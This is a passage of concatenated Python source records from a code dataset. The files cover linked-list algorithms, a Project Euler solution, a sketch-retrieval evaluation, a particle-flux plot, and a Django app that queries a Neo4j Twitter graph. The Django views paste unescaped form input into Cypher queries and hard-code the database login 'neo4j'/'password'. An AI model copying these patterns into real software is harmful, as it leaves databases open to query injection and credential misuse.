'/home/jiangli/data_tc/hefei_data/train/train')\n\n","sub_path":"hefei_xindiantu/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"131825667","text":"#Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n \n # control empty lists\n if(l1==None) : return l2\n if(l2==None) : return l1\n \n # define start point (head)\n head=None\n if(l1.val<=l2.val):\n head=l1\n l1=l1.next\n else:\n head=l2\n l2=l2.next\n \n # connect lists\n l3_cur=head\n while(l1 and l2):\n if(l1.val<=l2.val):\n l3_cur.next=l1\n l3_cur=l3_cur.next\n l1=l1.next\n else:\n l3_cur.next=l2\n l3_cur=l3_cur.next\n l2=l2.next\n \n # attach whichever list has not yet reached None\n if(l1) : l3_cur.next=l1\n else : l3_cur.next=l2\n \n return head\n ","sub_path":"LinkedList/MergeTwoSortedLists/MergeTwoSortedLists/MergeTwoSortedLists.py","file_name":"MergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"145052160","text":"def temp(x):\n # sum of all multiples of 3 or 5 below x\n sum=0\n for i in range(1,x):\n if (i%3 == 0) or (i%5 == 0):\n sum += i\n return sum\n\nprint(temp(10)) \nprint(\"answer: \", 
temp(1000))","sub_path":"EulerProject/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"331214598","text":"'''\n\nSort a linked list using insertion sort.\n\n'''\n\nfrom ListNode import ListNode\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n# @note: 下面超时解法,因��大数据而且是全部排序好的大数据,而fail\n# 所以,优化集中在怎么处理已经排序好的情况。这种题,一定要跟一个例子,否则细节很容易忽略\n# 优化在于,\n# 1. 如果其中某个sub-list是排序好的,比如,4,5,6,1,2,3 那么可以一次性把4,5,6切到dummy后面,然后一次性把1,2,3切到4前面\n# 2. cut操作head.next = None多余,因为后面插入的时候,head.next会overwrite掉,不需要先改成None\n#\n# ref: http://www.cnblogs.com/zuoyuan/p/3700105.html\n\nclass Solution(object):\n def insertionSortList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n \n if not head:\n return head\n \n dummy = ListNode(0)\n dummy.next = head\n \n while head.next:\n \n if head.val < head.next.val: # @note: meaning sub-list sorted\n head = head.next\n else:\n # head.next = None # cut this one from 2nd half sub-list # @note: 不需要这步\n \n # @note: eg: input 4,5,6,1,2,3 \n cutSingleNode = head.next # in eg. 1\n \n # in 1st half sub-list, find its position\n scanner = dummy # start at very beginning\n while scanner.next and scanner.next.val < cutSingleNode.val:\n scanner = scanner.next\n \n # now, head should be inserted after scanner\n # @note: eg: input 4,5,6,1,2,3 - now, head=6, scanner=dummy\n head.next = head.next.next # in eg. cut 1 out, and 6=>2\n cutSingleNode.next = scanner.next\n scanner.next = cutSingleNode\n \n # dummy = dummy.next # update tail of 1st half sub-list # @note: not necessary...to maintain tail node...\n \n return dummy.next\n\n\nclass Solution_over_time(object):\n def insertionSortList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n \n if not head:\n return head\n \n dummy = ListNode(0)\n dummyCopy = dummy\n \n while head:\n \n headNextRecord = head.next\n head.next = None # cut this one from 2nd half sub-list\n \n # in 1st half sub-list, find its position\n scanner = dummyCopy # start at very beginning\n while scanner.next and scanner.next.val < head.val:\n scanner = scanner.next\n \n # now, head should be inserted after scanner\n tmp = scanner.next\n scanner.next = head\n head.next = tmp\n \n head = headNextRecord # update new head of 2nd half sub-list\n \n # dummy = dummy.next # update tail of 1st half sub-list # @note: not necessary...to maintain tail node...\n \n return dummyCopy.next\n \nif __name__ == '__main__':\n pass","sub_path":"python/Insertion_Sort_List.py","file_name":"Insertion_Sort_List.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"646619488","text":"import os\nimport pickle as pkl\nfrom inspect import signature\n\nimport matplotlib.pyplot as plt\n\nfrom load import load_images_from_dir\nfrom retrieval import retrieve\nfrom util import calc_precision, calc_recall\nfrom util import get_categories_from_indices\nfrom util import read_config\nfrom retrieval import cascaded_retrieval\n\n\ncfg = read_config()\nfilenames, sketch_categories, sketches = load_images_from_dir(\n cfg['sketch_dir'])\n\nfeatures = cfg['features']\nfeature_dict = {}\nfor feature in features:\n img_features = pkl.load(open(os.path.join(cfg['feature_bank'], feature +\n \".pkl\"), \"rb\"))\n feature_dict[feature] = img_features\n\nmetric_dict = 
{'hu_moments': 'euclidean', 'hog': 'cityblock',\n 'sift': 'sift_distance'}\n\nresults = cascaded_retrieval(sketches, ['sift', 'hu_moments', 'sift', 'hu_moments'],\n feature_dict,\n [350, 150, 50, 20], metric_dict)\n\n# klist = [5 , 10, 20, 30]#, 90, 100, 110, 170, 180, 190, 195]\nklist = [20]\navg_precision_values = []\navg_recall_values = []\ntotal_category_images = 200\n\navg_precision_values_per_category = dict()\navg_recall_values_per_category = dict()\n\nfor category in sketch_categories:\n avg_precision_values_per_category[category] = []\n avg_recall_values_per_category[category] = []\n\nfor k in klist:\n print(\"Performance metrics at k = \", k)\n ppq = [] # precision per query\n rpq = []\n ppc = dict() # precision per category\n rpc = dict()\n\n for category in sketch_categories:\n ppc[category] = []\n rpc[category] = []\n\n total_queries = len(sketches)\n for i in range(len(results)):\n indices = results[i]\n img_categories = get_categories_from_indices(indices,\n cfg['categories'])\n query_precision = calc_precision(sketch_categories[i], img_categories)\n ppq.append(query_precision)\n query_recall = calc_recall(sketch_categories[i], img_categories,\n total_category_images)\n rpq.append(query_recall)\n ppc[sketch_categories[i]].append(query_precision)\n rpc[sketch_categories[i]].append(query_recall)\n\n avg_precision = sum(ppq) / total_queries\n avg_recall = sum(rpq) / total_queries\n avg_precision_values.append(avg_precision)\n avg_recall_values.append(avg_recall)\n print(\"Average precision: \", avg_precision)\n print(\"Average recall: \", avg_recall)\n\n for category in ppc:\n total_queries_per_category = len(ppc[category])\n avg_ppc = sum(ppc[category]) / total_queries_per_category\n avg_rpc = sum(rpc[category]) / total_queries_per_category\n avg_precision_values_per_category[category].append(avg_ppc)\n avg_recall_values_per_category[category].append(avg_rpc)\n print(\"Average precision per category-\", category, \" : \", avg_ppc)\n print(\"Average recall per category-\", category, \" : \", avg_rpc)\n\nstep_kwargs = ({'step': 'post'}\n if 'step' in signature(plt.fill_between).parameters\n else {})\n\nprint(\"avg precision values\", avg_precision_values)\nprint(\"avg recall values\", avg_recall_values)\n\nplt.step([0] + avg_recall_values,\n [avg_precision_values[0]] + avg_precision_values)\nplt.fill_between([0] + avg_recall_values, avg_precision_values + [0],\n alpha=0.2, **step_kwargs)\nplt.title(\"Precision Recall curve\")\nplt.xlabel(\"Recall\")\nplt.ylabel(\"Precision\")\nplt.ylim((0, 1))\nplt.show()\n\nfor category in avg_precision_values_per_category:\n precision_values = avg_precision_values_per_category[category]\n recall_values = avg_recall_values_per_category[category]\n print(category, \"avg precision values\", precision_values)\n print(category, \"avg recall values\", recall_values)\n plt.step([0] + recall_values, [precision_values[0]] + precision_values)\n plt.fill_between([0] + recall_values, precision_values + [0], alpha=0.2,\n **step_kwargs)\n title = \"Precision Recall curve for category- \" + category\n plt.title(title)\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.ylim((0, 1))\n plt.show()\n","sub_path":"src/cascading_experiments_shoe_dataset.py","file_name":"cascading_experiments_shoe_dataset.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461613735","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\ndef 
E3Flux(E):\n return 1.43e-8 * np.power(E / 1000.0 , -2.7) * np.power(E, 3) # cm^-2 s^-1 sr^-1 GeV^-1 * GeV^3\n\ndef Electronflux(E):\n if E < 1000:\n return 1.37e-8 * np.power(E / 103.0, -3.17) * np.power(E, 3) # cm^-2 s^-1 sr^-1 GeV^-1 * GeV^3\n else:\n return 1.17e-11 * np.power(E / 1000.0, -3.9) * np.power(E, 3) # cm^-2 s^-1 sr^-1 GeV^-1 * GeV^3\n\nEnergy = np.logspace(1,6) # GeV\nbkg_rej = np.logspace(-6, -2, 5) # 10^-6, 10^-5, 10^-4, 10^-3, 10^-2\n\n\nfig = plt.figure(figsize=(8,6))\nsub = fig.add_subplot(111) # 1 row x 1 col, 1 subplot\n# cmap = plt.get_cmap('viridis', np.size(life))\n\n# for i in range(bkg_rej.size):\n# rejfactor = bkg_rej[i]\n# E3dNdE = rejfactor * np.array([E3Flux(x) for x in Energy])\n# sub.plot(Energy, E3dNdE, Lable = bkg_rej[i])\n\ndN1 = bkg_rej[0] * np.array([E3Flux(x) for x in Energy])\n\ndN2 = bkg_rej[1] * np.array([E3Flux(x) for x in Energy])\n\ndN3 = bkg_rej[2] * np.array([E3Flux(x) for x in Energy])\n\ndN4 = bkg_rej[3] * np.array([E3Flux(x) for x in Energy])\n\ndN5 = bkg_rej[4] * np.array([E3Flux(x) for x in Energy])\n\ndNE = np.array([Electronflux(x) for x in Energy])\n\nsub.plot(Energy,dN1, label=r'$10^{-6}$')\nsub.plot(Energy,dN2, label=r'$10^{-5}$')\nsub.plot(Energy,dN3, label=r'$10^{-4}$')\nsub.plot(Energy,dN4, label=r'$10^{-3}$')\nsub.plot(Energy,dN5, label=r'$10^{-2}$')\nsub.plot(Energy,dNE, label=\"CR-electron\")\n\nsub.legend()\nsub.set_xlabel(r'$Energy(GeV)$')\nsub.set_ylabel(r'$E^{3}\\frac{dN_e}{dE_{CR}}(GeV^2/(cm^2s\\ sr))$')\nsub.set_xscale('symlog')\nsub.set_yscale('log')\nplt.title(r'$normalized\\ f_{CR}(E) \\times background\\ rejection (\\epsilon_{CR})$') \n\nplt.show()","sub_path":"bkg_rejection_calculate/bkg_rejection.py","file_name":"bkg_rejection.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405789632","text":"from __future__ import print_function\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\nfrom django import forms\nfrom django.urls import reverse\nfrom .forms import *\nfrom .models import *\nimport django_tables2 as tables\nfrom datetime import datetime, timezone\nfrom pprint import *\nfrom pprint import *\nimport jinja2 as jj\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, MultiField, ButtonHolder, Submit, HTML, Div, Row, Column\nfrom .generate_queries import *\nfrom django.forms.widgets import SelectDateWidget\nfrom dateutil import parser\n\n\nfrom neo4j.v1 import GraphDatabase, basic_auth\nfrom datetime import datetime\nimport json\nimport os\nimport time\n\nmatch_s = \"\"\"MATCH {% for aa in act_att %}({{aa[0]}} {{aa[1]}}),{% endfor %}\"\"\"\nwhere_s = \"\"\"WHERE {% for rel in rels %} ({{rel[0]}}) -[:{{rel[1]}}]-> ({{rel[2]}}) AND {% endfor %}\"\"\"\nreturn_s = \"\"\"RETURN {% for po in prop_vars %} {{po[0]}}({{po[1]}}), {% endfor %}\"\"\"\ntotal_s = \"\"\"\n{% for p in parts %}{{p}}\n{% endfor %}\n\"\"\"\n\ndef generate_simple_query(actors,attributes,relations,return_values):\n actors = [x[0]+\" :\"+x[1] for x in actors]\n attribs = [\", \".join([\"{\"+x[i][0]+\":\"+str(x[i][1])+\"}\" for i in range(len(x))]) for x in attributes]\n act_att = zip(actors,attribs)\n\n m_template = jj.Template(match_s)\n m_code = m_template.render(act_att=act_att)\n w_template = jj.Template(where_s)\n w_code = w_template.render(rels=relations)\n 
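# For the bkg_rejection record above: the rejected proton flux rises with
# energy while the CR-electron flux falls, so each rejection factor has a
# crossover energy above which the background would dominate; an illustrative
# brute-force scan over the same grid:
#     for rej in bkg_rej:
#         E_cross = next((E for E in Energy if rej * E3Flux(E) > Electronflux(E)), None)
#         print(rej, E_cross)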
r_template = jj.Template(return_s)\n r_code = r_template.render(prop_vars=return_values)\n\n m_code = m_code.rstrip().rstrip(\",\")\n w_code = w_code.rstrip().rstrip(\"AND\")\n r_code = r_code.rstrip().rstrip(\",\")\n\n print(m_code)\n print(w_code)\n print(r_code)\n\n tot_template = jj.Template(total_s)\n tot_code = tot_template.render(parts=[m_code,w_code,r_code])\n return tot_code\n\n# sq = generate_simple_query(actors=[(\"u1\",\"USER\"),(\"u2\",\"USER\"),(\"x\",\"USER\")],attributes=[[(\"id\",101311381)],[(\"id\",44196397)],[]],relations=[(\"x\",\"FOLLOWS\",\"u1\"),(\"x\",\"FOLLOWS\",\"u2\")],return_values=[(\"count\",\"x\")])\n\nclass UserForm(forms.Form):\n User_Variable = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n UserId = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass TweetForm(forms.Form):\n Variable_Name = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Hashtag = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Retweet_Of = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n Reply_Of = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n Quoted = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n Has_Mentioned = forms.ModelChoiceField(queryset=User.objects.all(),required=False)\n\nclass RelationForm(forms.Form):\n Source = forms.ModelChoiceField(queryset=User.objects.all(),required=False)\n URelationShip = forms.ChoiceField(choices=[(x,x) for x in [None,\"FOLLOWS\",\"STARTED_FOLLOWING\",\"FOLLOWED\"]],required=False)\n UDestination = forms.ModelChoiceField(queryset=User.objects.all(),required=False)\n \n Ut1 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Ut1m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n Ut2 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Ut2m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n\n TRelationShip = forms.ChoiceField(choices=[(x,x) for x in [None,\"TWEETED\"]],required=False)\n TDestination = forms.ModelChoiceField(queryset=Tweet.objects.all(),required=False)\n\n Tt1 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Tt1m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n\n Tt2 = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Tt2m = forms.TimeField(widget=forms.TimeInput(format='%H:%M'),required=False)\n\nclass EvaluateForm(forms.Form):\n Eval_Variable = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Property = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass TweetTable(tables.Table):\n Variable_Name = tables.Column()\n Hashtag = tables.Column()\n Retweet_Of = tables.Column()\n Reply_Of = tables.Column()\n Quoted = tables.Column()\n Has_Mentioned = tables.Column()\n\n class Meta:\n attrs = {'class': 'paleblue','width':'200%'}\n\nclass UserTable(tables.Table):\n Variable_Name = tables.Column()\n UserId = tables.Column()\n class Meta:\n attrs = {'class': 'paleblue','width':'200%'}\n\nclass RelationTable(tables.Table):\n Source = tables.Column()\n Relation_Ship = tables.Column()\n Destination = tables.Column()\n Begin = tables.Column()\n End = tables.Column()\n class Meta:\n attrs = 
{'class': 'paleblue','width':'200%'}\n\nclass DummyForm(forms.Form):\n    pass\n\n########################################################### View functions ###############################################################\ndef index(request):\n    if(request.method==\"GET\"):\n        dummy1 = DummyForm()\n        dummy2 = DummyForm()\n\n    elif(\"simple\" in request.POST):\n        print(\"came here\")\n        return HttpResponseRedirect(reverse(\"answer_query\"))\n    elif(\"custom\" in request.POST):\n        print(\"came here\")\n        return HttpResponseRedirect(reverse(\"query\"))\n\n    dummy1 = DummyForm()\n    dummy2 = DummyForm()\n    return render(request, 'use/index.html', {\"dummy1\":dummy1, \"dummy2\":dummy2})\n\ndef transform_time(t,tm):\n    # print(parser.parse(str(t)[:5]+\" \"+str(tm)))\n    return parser.parse(str(t)[:5]+\" \"+str(tm)).timestamp()\n\ndef query(request):\n    output_s = \"\"\n    query_s = \"\"\n    if request.method == 'GET':\n        uform = UserForm()\n        tform = TweetForm()\n        rform = RelationForm()\n        eform = EvaluateForm()\n\n    elif \"b1\" in request.POST:\n        uform = UserForm(request.POST)\n        print(\"first button pressed\")\n        if uform.is_valid():\n            vn = uform.cleaned_data['User_Variable']\n            i = uform.cleaned_data['UserId']\n            print(\"vn is \",vn)\n            s = User.objects.create(uname=vn, userid=i)\n    elif \"b2\" in request.POST:\n        tform = TweetForm(request.POST)\n        print(\"second button pressed\")\n        if tform.is_valid():\n            n = tform.cleaned_data['Variable_Name']\n            ht = tform.cleaned_data['Hashtag']\n            retof = tform.cleaned_data['Retweet_Of']\n            repof = tform.cleaned_data['Reply_Of']\n            quo = tform.cleaned_data['Quoted']\n            hasmen = tform.cleaned_data['Has_Mentioned']\n            if(retof==None):\n                retofs = \"\"\n            else:\n                retofs = retof.tname\n            if(repof==None):\n                repofs = \"\"\n            else:\n                repofs = repof.tname\n            if(quo==None):\n                quos = \"\"\n            else:\n                quos = quo.tname\n            if(hasmen==None):\n                hasmens = \"\"\n            else:\n                hasmens = hasmen.uname\n            s = Tweet.objects.create(tname=n, hashtag=ht, retweet_of=retofs, reply_of=repofs, quoted=quos, has_mention=hasmens)\n    elif \"b3\" in request.POST:\n        rform = RelationForm(request.POST)\n        print(\"third button pressed\")\n        if rform.is_valid():\n            # pprint(rform.cleaned_data)\n            src = rform.cleaned_data['Source']\n            udst = rform.cleaned_data['UDestination']\n            tdst = rform.cleaned_data['TDestination']\n            urel = rform.cleaned_data['URelationShip']\n            trel = rform.cleaned_data['TRelationShip']\n            ut1d = rform.cleaned_data['Ut1']\n            ut1m = rform.cleaned_data['Ut1m']\n\n            ut2d = rform.cleaned_data['Ut2']\n            ut2m = rform.cleaned_data['Ut2m']\n\n            tt1d = rform.cleaned_data['Tt1']\n            tt1m = rform.cleaned_data['Tt1m']\n\n            tt2d = rform.cleaned_data['Tt2']\n            tt2m = rform.cleaned_data['Tt2m']\n\n            try:\n                ut1 = transform_time(ut1d,ut1m)\n            except:\n                ut1 = \"\"\n            try:\n                ut2 = transform_time(ut2d,ut2m)\n            except:\n                ut2 = \"\"\n            try:\n                tt1 = transform_time(tt1d,tt1m)\n            except:\n                tt1 = \"\"\n            try:\n                tt2 = transform_time(tt2d,tt2m)\n            except:\n                tt2 = \"\"\n\n            print(\"the values of times are \",ut1,ut2,tt1,tt2)\n\n            if src!=None and urel!=None and udst!=None:\n                s = Relation.objects.create(source=src.uname, relation=urel, destn=udst.uname, bt=ut1, et=ut2)\n            if src!=None and trel!=\"\" and tdst!=None:\n                print(trel)\n                s = Relation.objects.create(source=src.uname, relation=trel, destn=tdst.tname, bt=tt1, et=tt2)\n    elif \"submit\" in request.POST:\n        print(\"came into submit condition \")\n        users = []\n        uprops = []\n        tweets = []\n        tprops = []\n        relations = []\n        eform = EvaluateForm(request.POST)\n        if eform.is_valid():\n            var = eform.cleaned_data['Eval_Variable']\n            prop = 
eform.cleaned_data['Property']\n for u in User.objects.all():\n users.append((u.uname,\"USER\"))\n up = []\n if u.userid!=\"\":\n up.append((\"id\",u.userid))\n uprops.append(up)\n for t in Tweet.objects.all():\n tweets.append((t.tname,\"TWEET\"))\n tp = []\n if t.hashtag!=\"\":\n tp.append((\"hashtag\",t.hashtag))\n if t.retweet_of!=\"\":\n tp.append((\"retweet_of\",t.retweet_of))\n if t.reply_of!=\"\":\n tp.append((\"reply_of\",t.reply_of))\n if t.quoted!=\"\":\n tp.append((\"quoted\",t.quoted))\n if t.has_mention!=\"\":\n tp.append((\"has_mention\",t.has_mention))\n tprops.append(tp)\n for r in Relation.objects.all():\n relations.append((r.source,r.relation,r.destn,r.bt,r.et))\n pprint(users)\n pprint(uprops)\n pprint(tweets)\n pprint(tprops)\n pprint(relations)\n sq = create_query(actors=users+tweets,attributes=uprops+tprops,relations=relations,return_values=[(prop,var)])\n print(\"the query is \",sq)\n query_s = sq\n \n driver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=basic_auth(\"neo4j\", \"password\"))\n session = driver.session()\n result = session.run(sq,{})\n for r in result:\n print(r)\n output_s += str(r)\n session.close()\n \n User.objects.all().delete()\n Tweet.objects.all().delete()\n Relation.objects.all().delete()\n\n d = []\n for usr in User.objects.all():\n d.append({\"Variable_Name\":usr.uname,\"UserId\":usr.userid})\n utable = UserTable(d)\n d = []\n for twt in Tweet.objects.all():\n d.append({\"Variable_Name\":twt.tname,\"Hashtag\":twt.hashtag,\"Retweet_Of\":twt.retweet_of,\"Reply_Of\":twt.reply_of,\"Quoted\":twt.quoted,\"Has_Mentioned\":twt.has_mention})\n ttable = TweetTable(d)\n\n d = []\n for rel in Relation.objects.all():\n d.append({\"Source\":rel.source,\"Relation_Ship\":rel.relation,\"Destination\":rel.destn,\"Begin\":rel.bt,\"End\":rel.et})\n rtable = RelationTable(d)\n # print(d)\n tables.RequestConfig(request).configure(utable)\n tables.RequestConfig(request).configure(ttable)\n tables.RequestConfig(request).configure(rtable)\n\n uform = UserForm()\n tform = TweetForm()\n rform = RelationForm()\n eform = EvaluateForm()\n return render(request, 'use/query.html', {\"query_s\":query_s, 'output_s':output_s, 'uform': uform,'tform': tform,'rform': rform, 'eform' : eform, 'user_list':utable,'tweet_list':ttable,'relation_list':rtable,})\n\n\n\nq1 = \"\"\"match (u:USER)-[:TWEETED]->(t:TWEET)-[:HAS_HASHTAG]->(:HASHTAG {text:\"{{h}}\"}) with distinct u as u1 return count(u1)\"\"\"\nq2 = \"\"\"match (x:USER)-[:FOLLOWS]->(:USER {id:{{u1}}}), (x)-[:FOLLOWS]->(:USER {id:{{u2}}}) with distinct x as x1 return count(x1)\"\"\"\nq3 = \"\"\"\nmatch (fe:FOLLOW_EVENT)-[:FE_FOLLOWED]->(u:USER {id:{{u}}}) \nwhere fe.timestamp > {{t1}} and fe.timestamp < {{t2}}\nreturn count(fe)\n\"\"\"\nq4 = \"\"\"\nmatch (x:USER {id:{{u}}})-[:TWEETED]->(:TWEET)-[:HAS_HASHTAG]->(h:HASHTAG), (f:USER)-[:FOLLOWS]->(x), (f)-[:TWEETED]->(:TWEET)-[:HAS_HASHTAG]->(h) \nwith distinct f as f1 \nreturn count(f1)\n\"\"\"\nq5 = \"\"\"\nmatch (te:TWEET_EVENT)-[:TE_TWEET]->(:TWEET)-[:RETWEET_OF]->(t:TWEET), (te)-[:TE_USER]->(:USER {id:{{u}}}), (x:USER)-[:TWEETED]->(t) \nwhere te.timestamp < {{t1}} and te.timestamp > {{t2}} \nwith distinct x as x1 \nreturn count(x1)\n\"\"\"\nclass SameHash(forms.Form):\n Hashtag = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass CommomFollower(forms.Form):\n User1 = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n User2 = forms.CharField(widget=forms.TextInput(attrs={'class' : 
'myfieldclass'}),required=False)\n\nclass NewFollowers(forms.Form):\n User = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Begin_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Begin_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\n End_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n End_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\nclass HashFolForm(forms.Form):\n User = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n\nclass RetweetForm(forms.Form):\n User = forms.CharField(widget=forms.TextInput(attrs={'class' : 'myfieldclass'}),required=False)\n Begin_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n Begin_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\n End_Date = forms.DateTimeField(required=False,widget=SelectDateWidget(years=(\"2016\",\"2017\")))\n End_Time = forms.TimeField(required=False,widget=forms.TimeInput(format='%H:%M'))\n\n\n\ndef answer_query(request):\n query_s = \"\"\n output_s = \"\"\n if(request.method==\"GET\"):\n shform = SameHash()\n cf = CommomFollower()\n nf = NewFollowers()\n hf = HashFolForm()\n rfform = RetweetForm()\n dummy = DummyForm()\n\n elif(\"custom\" in request.POST):\n print(\"came here\")\n return HttpResponseRedirect(reverse(\"query\"))\n else:\n if(\"b1\" in request.POST):\n shform = SameHash(request.POST)\n print(\"first button pressed\")\n if shform.is_valid():\n h = shform.cleaned_data['Hashtag']\n q_template = jj.Template(q1)\n q_code = q_template.render(h=h)\n query_s = q_code\n elif(\"b2\" in request.POST):\n cfform = CommomFollower(request.POST)\n print(\"second button pressed\")\n if cfform.is_valid():\n u1 = cfform.cleaned_data['User1']\n u2 = cfform.cleaned_data['User2']\n q_template = jj.Template(q2)\n q_code = q_template.render(u1=u1,u2=u2)\n query_s = q_code\n elif(\"b3\" in request.POST):\n nfform = NewFollowers(request.POST)\n print(\"third button pressed\")\n if nfform.is_valid():\n u = nfform.cleaned_data['User']\n bd = nfform.cleaned_data['Begin_Date']\n bt = nfform.cleaned_data['Begin_Time']\n ed = nfform.cleaned_data['End_Date']\n et = nfform.cleaned_data['End_Time']\n\n t1 = transform_time(bd,bt)\n t2 = transform_time(ed,et)\n\n q_template = jj.Template(q3)\n q_code = q_template.render(u=u,t1=t1,t2=t2)\n query_s = q_code\n elif(\"b4\" in request.POST):\n hfform = HashFolForm(request.POST)\n print(\"4th button pressed\")\n if hfform.is_valid():\n u = hfform.cleaned_data['User']\n q_template = jj.Template(q4)\n q_code = q_template.render(u=u)\n query_s = q_code\n\n elif(\"b5\" in request.POST):\n rfform = NewFollowers(request.POST)\n print(\"5th button pressed\")\n if rfform.is_valid():\n u = rfform.cleaned_data['User']\n bd = rfform.cleaned_data['Begin_Date']\n bt = rfform.cleaned_data['Begin_Time']\n ed = rfform.cleaned_data['End_Date']\n et = rfform.cleaned_data['End_Time']\n t1 = transform_time(bd,bt)\n t2 = transform_time(ed,et)\n\n q_template = jj.Template(q5)\n q_code = q_template.render(u=u,t1=t1,t2=t2)\n query_s = q_code\n driver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=basic_auth(\"neo4j\", \"password\"))\n session = driver.session()\n result = session.run(q_code,{})\n for r in result:\n print(r)\n output_s += str(r)\n session.close()\n\n shform = SameHash()\n cfform = 
CommomFollower()\n nfform = NewFollowers()\n hfform = HashFolForm()\n rfform = RetweetForm()\n dummy = DummyForm()\n return render(request, 'use/ans_query.html', {\"dummy\":dummy,\"shform\":shform, \"cfform\":cfform, \"nfform\":nfform, \"hfform\":hfform, \"rfform\":rfform, \"query_s\":query_s,\"output_s\":output_s})","sub_path":"Query Gen Website/use/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97992330","text":"from collections import Counter\nimport json\n\nimport ftfy\n\nimport sys, os\nimport re\nfrom glob import glob\nfrom nltk import word_tokenize\n\nsys.path.insert(1, '../scripts/convert_standoff_conll_ner/')\nimport anntoconll_wlp\n\n\n\n\n\ndef Read_Files_in_Input_Folder(input_folder):\n start_dir = input_folder\n # start_dir = \"/Users/jeniya/Desktop/NER_RECOG_SW/brat-v1.3_Crunchy_Frog/data/so_annotated_data/selected/phase_01_01\"\n pattern = \"*.txt\"\n file_location_list=[]\n for dir,_,_ in os.walk(start_dir):\n file_location_list.extend(glob(os.path.join(dir,pattern))) \n \n # print(\"total prtocols in : \", input_folder,\" = \", len(file_location_list))\n return sorted(file_location_list)\n\n\ndef Merge_Files(list_of_ip_files, op_file):\n\n fout = open(op_file,'w')\n\n for file in list_of_ip_files:\n for line in open(file):\n fout.write(line)\n\n\ndef make_dir_if_not_exists(dir_name):\n try:\n os.mkdir(dir_name)\n except Exception as e:\n pass\n\n\ndef preprocess_data(input_standoff_folder_train, output_conll_folder_train, output_conll_file_train,\n input_standoff_folder_test, output_conll_folder_test, output_conll_file_test):\n anntoconll_wlp.convert_standoff_conll_single_file(input_standoff_folder_train, output_conll_folder_train, output_conll_file_train)\n anntoconll_wlp.convert_standoff_conll_single_file(input_standoff_folder_test, output_conll_folder_test, output_conll_file_test)\n \n\n\n\n\n\nclass Sort_Entity_by_Count:\n \"\"\"docstring for Sort_Entity_by_Count\"\"\"\n def __init__(self, train_file,output_file):\n l = self.Read_File(train_file)\n #\n self.list_of_train_sentence_words=l[0]\n self.list_of_train_sentence_labels=l[1]\n\n train_label_counter = Counter(x for xs in self.list_of_train_sentence_labels for x in xs)\n train_result=self.get_label_counter(train_label_counter)\n\n\n list_keys= [x[0] for x in train_result[\"label_phrase_counter\"].most_common()]\n with open(output_file, 'w') as outfile:\n json.dump(list_keys, outfile)\n\n\n\n def get_label_counter(self, label_counter):\n label_phrase_counter=Counter()\n 